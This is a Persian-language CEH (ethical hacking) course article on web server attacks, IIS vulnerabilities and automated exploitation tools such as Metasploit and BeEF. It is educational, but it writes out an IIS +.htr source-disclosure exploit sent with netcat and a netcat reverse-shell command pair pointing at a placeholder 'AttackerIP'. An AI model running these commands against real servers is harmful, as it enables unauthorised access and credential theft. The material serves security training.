آموزش رایگان دوره CEH همگام با سرفصل‌های بین‌المللی – 39
آموزش CEH (هکر کلاه سفید): آشنایی با ابزارهای بهره‌برداری خودکار از رخنه‌های امنیتی
احراز هویت نقش مهمی در امنیت وب‌سایت‌ها ایفا می‌کند. ممکن است بخش‌هایی در یک سایت وجود داشته باشند که باید محدود شوند یا دسترسی به محتوای محرمانه یا حساس برای هر فردی امکان‌پذیر نباشد. روش‌های مختلف زیادی برای تأیید اعتبار کاربران وجود دارد. احراز هویت می‌تواند شامل حالتی باشد که شما در قالب نام کاربری و رمزعبور آن‌را می‌شناسید، حالتی باشد که در قالب توکن یا کارت هوشمند آن‌را می‌شناسید یا حتا حالت‌ هایی شبیه به اثر انگشت، اسکن شبکیه یا تشخیص صدا باشد. تأیید اعتبار با رمزهای عبور یکی از رایج‌ترین شکل‌های تأیید اعتبار و همچنین ضعیف‌ترین آن‌ها است. در تمامی موارد ابزارهای خاصی برای گذر از این مکانیزم‌های امنیتی ابداع شده است.

برای مطالعه قسمت قبل آموزش رایگان  دوره CEH اینجا کلیک کنید.

حملات مرد میانی

حملات man-in-the-middle با هدف قرار گرفتن میان کلاینت و سرور و جمع‌آوری یا تغییر اطلاعات پیاده‌سازی می‌شوند. ابزارهایی شبیه به Burp Proxy برای پیاده‌سازی یک چنین حملاتی استفاده می‌شوند.

تغییر ظاهر وب‌سایت

تغییر ظاهر وب‌سایت حمله دیگری است که برای اعمال تغییراتی در رابط کاربری یک وب‌سایت پیاده‌سازی می‌شوند. حدس زدن گذرواژه، سوءاستفاده از آسیب‌پذیری و حتا تزریق SQL روش‌های متداول در پیاده‌سازی این مدل حملات هستند. امروزه این مدل حملات به اشکال مختلف پیاده‌سازی می‌شوند و جالب آن‌که در سال 2014 شکل ظاهری صفحه اصلی سازمان EC-Council قربانی این حمله شد. در حمله فوق هکرها تصویری از گذرنامه ادوارد اسنودن را در صفحه اصلی سایت قرار دادند. برای اطلاعات بیشتر در خصوص کم و کیف این حمله به آدرس زیر مراجعه کنید.

https:// www.scmagazine.com/ec-council-website-defaced-by-hacker/article/538697/

سوء استفاده از پیکربندی اشتباه وب‌سرور

پیکربندی اشتباه وب‌سرور یکی دیگر از بردارهای حمله متداول است. یک نمونه در این زمینه فایل httpd.conf است:

<location /server-status>

SetHandler server-status

</Location>

این فایل پیکربندی به هر کاربری امکان مشاهده صفحه وضعیت سرور را می‌دهد که حاوی اطلاعات دقیقی در مورد استفاده فعلی از وب‌سرور است. دیگر فایل php.ini است که در بسیاری از وب‌سرورها وجود دارد. در صورت استفاده از این فایل همراه با پیکربندی اشتباه توضیحات کاملی در مورد پیام‌های خطای اشتباه ارائه می‌دهد:

display_error = on

log_errors = on

Error_log = syslog

ignore_repeated_errors = Off

شکاف در پاسخ‌دهی HTTP

شکاف در پاسخ‌دهی HTTP امکان‌پذیر است، زیرا برنامه یا محیط مقادیر ورودی را به درستی و مطابق با استانداردهای مربوطه تنظیم نکرده‌اند. شکاف در پاسخ‌دهی HTTP به دلیل عدم اعتبارسنجی ورودی کاربر و ناتوانای در تشخیص کاراکترهای CR و LF امکان‌پذیر است:

CR = %0d = \r

LF = %0a = \n

برای پیشگیری از بروز آسیب‌پذیری شکاف در پاسخ‌دهی HTTP، تمامی فرم‌های کدگذاری شده باید از الگوی تجزیه کننده رشته‌های کاراکتری  CR LF \r\n %0d%0a استفاده کنند.

شکستن گذرواژه‌های وب‌سرور

احراز هویت نقش مهمی در امنیت وب‌سایت‌ها ایفا می‌کند. ممکن است بخش‌هایی در یک سایت وجود داشته باشند که باید محدود شوند یا دسترسی به محتوای محرمانه یا حساس برای هر فردی امکان‌پذیر نباشد. روش‌های مختلف زیادی برای تأیید اعتبار کاربران وجود دارد. احراز هویت می‌تواند شامل حالتی باشد که شما در قالب نام کاربری و رمزعبور آن‌را می‌شناسید، حالتی باشد که در قالب توکن یا کارت هوشمند آن‌را می‌شناسید یا حتا حالت‌ هایی شبیه به اثر انگشت، اسکن شبکیه یا تشخیص صدا باشد. تأیید اعتبار با رمزهای عبور یکی از رایج‌ترین شکل‌های تأیید اعتبار و همچنین ضعیف‌ترین آن‌ها است. به عنوان نمونه، وردپرس یکی از محبوب‌ترین سیستم‌عامل‌های وبلاگ‌نویسی در جهان است و حدود 20 درصد از کل وب‌سایت‌های حال حاضر بر مبنای آن ساخته شده‌اند.

هکرها می‌توانند از ابزاری مانند WPScan برای اسکن وب‌سایت‌های وردپرسی با حدود 500 مورد از رایج‌ترین رمزهای عبور استفاده کرده و در کمتر از یک دقیقه به سایت دسترسی پیدا کنند. هکرها می‌توانند فرآیند شکستن گذرواژه‌ها را در مورد هر صفحه تأیید اعتبار وب‌سایتی پیاده‌سازی کنند. اگر به دنبال فهرستی از رمزهای عبور مشترک هستید آدرس زیر اطلاعات کاملی در این ارتباط در اختیارتان قرار می‌دهد.

https://wiki.skullsecurance.org/Passwords

اکنون که ما حملات متداول وب‌سرورها را پوشش داده‌ایم، اجازه دهید به برخی از آسیب‌پذیریرهای خاص وجود در سرور IIS مایکروسافت نگاهی داشته باشیم.

آسیب‌پذیری‌های IIS

نسخه 8.5 سرور IIS پیشرفت‌های چشمگیری نسبه به نسخه‌های قدیمی‌تر داشته و ایمن‌تر از آن‌ها شده است. صرف نظر از نسخه، وب‌سرورها هنوز هم می‌توانند هدف قرار گیرند. در این بخش به تعدادی از آسیب‌پذیری‌های مطرح IIS که روزگاری سرتیتر اخبار بودند نگاهی خواهیم داشت.

حملات همواره اتفاق می‌افتند، بنابراین درک درست این موضوع که هکرها چگونگه موفق به سوءاستفاده از آسیب‌پذیری‌ها شده و یک حمله واقعی را پیاده‌سازی کرده‌اند مهم است. یک نمونه از این بردارها حمله سرریز بافر ISAPI DLL است. اهداف بهره‌برداری از idq.dll بود. هنگام اجرا، این حمله می‌تواند به یک سرریز بافر منجر شود که در نهایت سرورهایی که IIS را اجرا می‌کنند را با خطر جدی روبرو کند. آنچه این آسیب‌پذیری را به شدت مخرب می‌کند این است که سرویس بخشی از IIS Indexing بوده و حتی نیازی به اجرای فعال نیست. از آن‌جایی که idq.dll در قالب یک فرآیند سیستمی اجرا می‌شود، مهاجم می‌تواند به راحتی امتیاز خود را افزایش داده و خود را به عنوان یک مدیر تعریف کند.

حملات افشای منبع را می‌توان برای کشف رمزهای عبور، طراحی وب یا منطق تجاری استفاده کرد. یک نمونه از این آسیب‌پذیری‌ها، آسیب‌پذیری WebDAV است. این حمله آسیب‌پذیری موجود در نسخه‌های IIS 5.1 / 6.0 را هدف قرار داده و کاربران اجازه می‌دهد با پوشه حاوی گذرواژه بتوانند به پوشه‌های امن WebDAV دسترسی پیدا کنند. از اسکریپت Nmap می‌توان برای بررسی این آسیب‌پذیری استفاده کرد. اسکریپت زیر این موضوع را نشان می‌دهد:

nmap --script http-iis-webdav-vuln -p80,8080 <host>

حمله افشای دیگر در ارتباط اب سوء استفاده از +.htr است. به دلیل آسیب‌پذیری موجود در ISM.dll ، IIS4 ، IIS5 و IIS6 می‌توان داده‌های منبع را فاش کرد. یک مهاجم با الصاق +.htr به فایل global.asa قادر به انجام این‌کار است. Netcat می‌تواند به بهره‌برداری از این آسیب‌پذیری کمک کند. کافی در ابتدا فایل متنی مشابه حالت زیر را ایجاد کرده و نام آن‌را htr.txt بگذارید:

GET /victims_address/global.asa+.htr HTTP/1.0

CR

CR

در مرحله بعد فرمان زیر را اجرا کنید:

nc -vv www.victim.com 80 < htr.txt

اگر سایت آسیب‌پذیر باشد، هکر اطلاعاتی شبیه به حالت زیر دریافت می‌کند:

HTTP/1.1 200 OK

Server: Microsoft -IIS /6.0

Date: Wed, 11 Feb 2015 00:32:12 GMT

<!--filename = global.asa -->

("Profiles_ConnectionString")= "DSN=Profiles; UID=User;

password=secret"

("LDAPUserID") = "cn=Admin"

("LDAPPwd") = "p@ssw0rd"

در آخرین مرحله هکر باید پوسته‌ای را با استفاده از Socat یا Netcat آماده کند. اکنون تنها کاری که مهاجم باید انجام دهد به‌کارگیری Netcat برای بازگرداندن یک پوسته فرمان با مجوزهای سیستمی روی کامپیوتر خودش است که عملیات در قالب دو دستور زیر اجرا می شوند:

1. اجرای فرمان از طریق کامپیوتر هکر:

nc.exe -l -p <Open Port>

2. اجرای فرمان زیر از طریق سرور IIS قربانی که cmdasp.asp را بارگذاری می‌کند.

nc.exe -v -e cmd.exe AttackerIP <Open Port>

وصله کردن سرورهای آسیب‌پذیری بهترین روش مقابله با این تهدیدات است. فقط به‌خاطر داشته باشید که حتا سرورهای به‌روزتری شبیه به ویندوز 2012 که از نسخه IIS 8.x استفاده می‌کنند ممکن است در برابر چنین حملاتی آسیب‌پذیر باشند. همچنین ممکن است مهاجم فراتر از وب‌سرور گام برداشته و به سراغ سرویس‌ها یا برنامه‌های کاربردی برود که روی سیستم در حال اجرا هستند. عوامل دیگری نیز به هکرها اجازه می‌دهند در کار خود موفق شوند که از آن جمله به موارد زیر می‌توان اشاره کرد:

عدم استفاده از رمزگذاری: ارتباطات مبتنی بر HTTP باعث می‌شوند تا اطلاعات مبادله توسط سرور در قالب یک متن ساده مبادله شوند.

به‌کارگیری نسخه غیر ایمنی از الگوریتم رمزنگار: اگر SSL نسخه 3 فعال باشد، ممکن است راه برای پیاده‌سازی گونه خاصی از حمله مرد میانی به‌نام POODLE سرنامPadding Oracle on Downgraded Legacy  هموار شود. اسکریپت Nmap زیر برای تشخیص این آسیب‌پذیری استفاده می‌شود:

nmap -sV --version-light --script ssl-poodle -p 443 <host>

اجازه برای اسکریپت‌نویسی cross-frame: این کار ممکن است در نهایت با فریب کاربران همراه باشد تا روی لینکی که تصور می‌کنند معتبر است کلیک کنند، در حالی که لینک با استفاده از کدهای مخرب جاوااسکریپت و با یک iframe آلوده شده‌اند تا کلیک‌های کاربر روبایش شده و در نهایت صفحات مخرب برای کاربر بارگذاری شوند. صفحاتی که با هدف سرقت اطلاعات شخصی کاربران طراحی شده‌اند.

فقط به یاد داشته باشید که با اجرای هر یک از این حملات، فعالیت‌های انجام شده توسط مهاجمان در فایل‌های گزارش ثبت می‌شود. بنابراین، انتظار می‌رود تا هکر به دنبال حذف یا تغییر فایل‌های گزارش باشد. اگر ورود به سیستم فعال باشد به احتمال زیاد آدرس آی‌پی مهاجم ضبط می‌شود.

نکته: یک ابزار هک در این زمینه WFetch است. ابزار فوق به هکر اجازه می‌دهد تا درخواست‌های HTTP را به‌طور کامل سفارشی کرده و به آزمایش این موضوع بپردازد که وب‌سرور چه واکنشی را به درخواست‌های سفارشی می‌دهد.

سرانجام، به‌خاطر داشته باشید که فقط وب‌سرورها نیستند که در برابر حملات آسیب‌پذیر هستند. هر سرویسی که یک کاربر یا هکر بتواند به آن دسترسی داشته باشد ممکن است یک هدف بالقوه باشد. به همین دلیل هکرها ممکن است از ابزارهایی مانند Metasploit برای اجرای حملات سرریز بافر استفاده کنند.

ابزارهای بهره‌برداری خودکار

از ابزارهای بهره‌برداری خودکار نیز می‌توان برای حمله به وب‌سرورها استفاده کرد. این ابزارها به هکرها امکان می‌دهند به سوء استفاده از برخی موارد مشکوک به آسیب‌پذیری استفاده کنید. این ابزارها در واقع می‌توانند قابلیت بهره‌برداری با یک کلیک را ارائه دهند. Metasploit احتمالاً شناخته شده‌ترین نمونه از ابزار‌ها در زمینه بهره‌برداری از آسیب‌پذیری‌ها است. Metasploit به شما امکان می‌دهد تا یک آدرس آی‌پی و شماره پورت یک دستگاه هدف را وارد کرده، اکسپلویت انتخاب شده را روی ماشین قربانی به ساده‌ترین شکل پیاده‌سازی کنید. ابزار فوق می‌تواند قربانی را به شما متصل کرده و یک پوسته فرمان روی سامانه قربانی باز کرده یا به شما امکان دهد کدی را روی سامانه قربانی اجرا کنید. بعد از اینکه روی قربانی پوسته‌ای ایجاد کردید، تنها چند قدم کوتاه فاصله دارید تا حساب کاربری خود را به یک کاربر ممتاز ارتقا دهید.

یکی دیگر از ابزارهای بهره‌برداری خودکار، چارچوب بهره‌برداری از مرورگر BeEF است. BeEF یک چارچوب بهره‌برداری قدرتمند است که برای ارزیابی وضعیت امنیتی یک هدف متمرکز و بهره‌برداری از آسیب‌پذیری‌های مرورگرها ساخته شده است. همان‌گونه که بسیاری از کارشناسان تست نفوذ از پروکسی‌هایی مانند Burp Proxy و OWASP Zed Application Proxy  استفاده می‌کنند، BeEF با هدف قرار دادن مستقیم مرورگر وب این‌کار را انجام می‌دهد.

هکرها از رخنه‌های موجود  در مرورگرها به عنوان روشی برای ویرایش یکسری تنظیمات خاص بدون اطلاع کاربر استفاده می‌کنند. چارچوب BeEF به کارشناسان تست نفوذ اجازه می‌دهد تا ماژول‌های خاصی را انتخاب کنند تا هر یک مرورگرها را بر مبنای رویکردهای مختلف آزمایش کنند. ابتدا یک هدف انتخاب می‌شود. پس از انتخاب هدف، کاربر می‌تواند ماژول خاصی را که برای حمله استفاده می‌شود بارگذاری کند. منطقه Load Modules نشان می‌دهد که ماژول‌ها برای بهره‌برداری در دسترس هستند. پس از انتخاب یک ماژول، امکان ارسال کد به مرورگر هدف فراهم می‌شود. پس از بارگذاری ماژول امکان بهره‌برداری از آسیب‌پذیری‌ها وجود دارد.

به‌طور مثال، از یک ماژول می‌توان برای هدف قرار دادن روشی که کامپیوترهای اپل در زمان شروع یک مکالمه مبتنی بر اسکایپ از آن استفاده بهره برد. مکالمه‌ای که بر مبنای یک آدرس اینترنتی غیر ایمن انجام می‌شود. در صورت موفقیت‌آمیز بودن حمله، BeEF بدون اجازه کاربر نهایی، تماس با اسکایپ را آغاز می‌کند. مثال فوق تنها گوشه‌ای از قابلیت‌های چهارچوب BeEF است، اما قدرت این ابزار به مراتب فراتر از مثال فوق است، به‌گونه‌ای که متخصصان امنیتی و کارشناسان تست نفوذ می‌توانند از آن برای آزمایش آسیب‌پذیری‌های سمت کلاینت استفاده کنند. سایر ماژول‌ها شامل سرریزهای مرورگر، اسکریپت cross-site، روبایش کلیدها و روبایش محتوای کلیپ‌بورد است. فقط به‌خاطر داشته باشید که این ابزارها می‌توانند برای هدف قرار دادن برنامه‌های وب و پایگاه‌های داده نیز استفاده شوند. از دیگر ابزارهای بهره‌برداری خودکار به موارد زیر می‌توان اشاره کرد:

■ Canvas: یک ابزار حمله و نفوذ خودکار است که از نشانی https://immunityinc.com/ قابل دریافت است. ابزار فوق به زبان پایتون نوشته شده و به شکل پرتابل قابل اجرا روی ویندوز و لینوکس است. Canvas  یک ابزار تجاری است که توانایی حمله و نفوذ را به متخصصان امنیتی می‌دهد. Canvas همانند Metasploit یک ابزار کامل نیست و نمی‌تواند کشف اولیه انجام دهد، بنابراین باید اهداف خود را به صورت دستی به آن اضافه کنید. با این‌حال به نسبت Metasploit پیشرفته‌تر بوده و برای استفاده از آن باید مجوز مربوطه به آن‌را خریداری کنید. به‌طور کلی یک ابزار درجه یک برای افرادی است که تجربه‌ای در زمینه نفوذ و ارزیابی دارند.

■ core Impact: مجموعه‌ای متشکل از ابزارهای پیشرفته آزمایش تست نفوذ تجاری است که از آدرس زیر قابل دریافت است.

https://www.coresecurance.com/core-impact

core impact ابزاری برای بهره‌برداری و ارزیابی اکسپلویت‌ها و مشکل روبایشک کلیک‌ها است. core impact این یک بسته کامل است که قدم به قدم به کاربر اجازه می‌دهد فرآیند اسکن را آغاز کرده و به تاریج به سراغ فازهای شناسایی و بهره‌برداری از اکسپلویت‌ها برود. یکی از ویژگی‌های منحصر به فرد این محصول این است که از ویژگی چرخش محوری پشتیبانی می‌کند که از نظر اصولی این امکان را فراهم می‌آورد که از یک ماشین به خطر برای نفوذ به ماشین دیگری استفاده کرد. این ابزار هم برای افراد تازه‌کار و هم برای متخصصان امنیت مفید است.

در شماره آینده مبحث فوق را ادامه می‌دهیم.

برای مطالعه رایگان تمام بخش‌های دوره CEH  روی لینک زیر کلیک کنید:

آموزش رایگان دوره CEH

ماهنامه شبکه را از کجا تهیه کنیم؟
ماهنامه شبکه را می‌توانید از کتابخانه‌های عمومی سراسر کشور و نیز از دکه‌های روزنامه‌فروشی تهیه نمائید.

ثبت اشتراک نسخه کاغذی ماهنامه شبکه     
ثبت اشتراک نسخه آنلاین

 

کتاب الکترونیک +Network راهنمای شبکه‌ها

  • برای دانلود تنها کتاب کامل ترجمه فارسی +Network  اینجا  کلیک کنید.

کتاب الکترونیک دوره مقدماتی آموزش پایتون

  • اگر قصد یادگیری برنامه‌نویسی را دارید ولی هیچ پیش‌زمینه‌ای ندارید اینجا کلیک کنید.

1607870047_0.gif

ایسوس

نظر شما چیست؟